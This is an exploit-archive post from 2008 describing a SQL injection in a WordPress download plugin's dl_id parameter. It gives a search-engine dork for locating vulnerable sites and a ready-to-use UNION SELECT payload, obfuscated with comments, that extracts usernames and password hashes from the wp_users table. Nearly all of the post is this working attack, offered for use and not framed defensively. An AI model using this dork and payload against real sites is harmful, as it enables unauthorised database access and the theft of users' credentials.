Wordpress Plugin Download (dl_id) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Wordpress Plugin Download (dl_id) SQL Injection Vulnerability
# Published : 2008-03-31
# Author : BL4CK
# Previous Title : RunCMS Module bamagalerie3 Remote SQL Injection Vulnerability
# Next Title : phpSpamManager 0.53b (body.php) Remote File Disclosure Vulnerability

###############################################################
#
# Wordpress Plugin Download file Remote SQL Injection Vulnerability
#
###############################################################
#
# Author: BL4CK
#
# Mail: bl4ck00@gmail.com
#
################################################################
#
# Dork: inurl:"wp-download.php?dl_id="
#
################################################################
Example:
http://localhost/[path]/[path]/[path]/wp-download.php?dl_id=[SQL]
SQL:
null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*
################################################################
# Greetz: ZioN, b!g B0$$, h4cky0u.org
################################################################

# www.Syue.com [2008-03-31]